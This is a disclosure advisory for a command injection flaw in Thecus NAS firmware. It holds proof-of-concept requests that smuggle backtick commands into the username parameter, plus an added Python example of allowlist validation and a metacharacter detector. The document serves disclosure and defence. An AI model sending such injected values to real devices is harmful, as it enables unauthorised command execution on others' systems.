Advisory Information
Title: Thecus NAS Server get_userid OS Command Injection
Date published: 13 January 2014
Reference: CVE-2013-5667
Advisory Summary
Missing input validation allows an attacker to execute arbitrary operating-system commands on the NAS.
Vendor
Thecus <http://www.thecus.com/>
Affected Software
Thecus NAS Server N8800 Firmware 5.03.01
Description of Issue
The issue exists because the application accepts user input through the get_userid parameter without validating it and embeds that input in a command line handed to the operating system shell, so backtick command substitution placed in a parameter value (see the proof of concept) is executed. An attacker can use this flaw to execute arbitrary commands.
Proof of Concept
Standard request:
get_userid=1&username=admin
Response:
{"get_userid":"1001","groupname":false,"data":[]}
Command Injection PoC:
1. Write a value for user admin to /tmp/xpto
get_userid=1&username=admin`echo+admin+>+/tmp/xpto`
2. Read the value back from /tmp/xpto
get_userid=1&username=`cat+/tmp/xpto`
Response:
{"get_userid":"1001","groupname":false,"data":[]}
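The following is an added example, not code from the advisory or from Thecus, showing the two defender-side controls this class of bug calls for: an allowlist check with a shell-free argv call in place of string concatenation into a shell command line, and a detector that flags request parameters carrying shell metacharacters. The username pattern and the `id -u` lookup are assumptions standing in for whatever the firmware actually runs.

```python
import re
import subprocess
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Allowlist for a local NAS account name (assumed policy, not Thecus's own rule):
# a POSIX-style name never contains shell metacharacters such as ` $ ; | > .
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")

def is_valid_username(name: str) -> bool:
    """True only when the whole name matches the allowlist."""
    return USERNAME_RE.fullmatch(name) is not None

def build_lookup_argv(username: str) -> List[str]:
    """Build `id -u <user>` as an argv list (no shell). The vulnerable pattern is
    concatenating the value into a shell command line run with shell=True."""
    if not is_valid_username(username):
        raise ValueError("username rejected by allowlist")
    return ["id", "-u", username]

def lookup_uid(username: str) -> Optional[str]:
    """Hardened lookup: validate, then run without a shell. None on failure."""
    try:
        argv = build_lookup_argv(username)
    except ValueError:
        return None
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout.strip() if proc.returncode == 0 else None

# Detection side: flag query-string values carrying shell metacharacters.
SHELL_META = re.compile(r"[`;|&<>]|\$\(")

def flag_suspicious_params(query: str) -> Dict[str, List[str]]:
    """Return the parameters whose decoded values contain shell metacharacters."""
    params = parse_qs(query, keep_blank_values=True)
    return {k: v for k, v in params.items()
            if any(SHELL_META.search(value) for value in v)}

# Constructed sample of request bodies: the advisory's normal request, its
# first PoC request, and a benign request for another account.
SAMPLE_REQUESTS = [
    "get_userid=1&username=admin",
    "get_userid=1&username=admin`echo+admin+>+/tmp/xpto`",
    "get_userid=1&username=backup_user",
]

if __name__ == "__main__":
    for body in SAMPLE_REQUESTS:
        print(body, "->", flag_suspicious_params(body) or "clean")
```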
Fix
ThecusOS 5 (32 bit):
http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom
ThecusOS 5 (64 bit):
http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom
http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom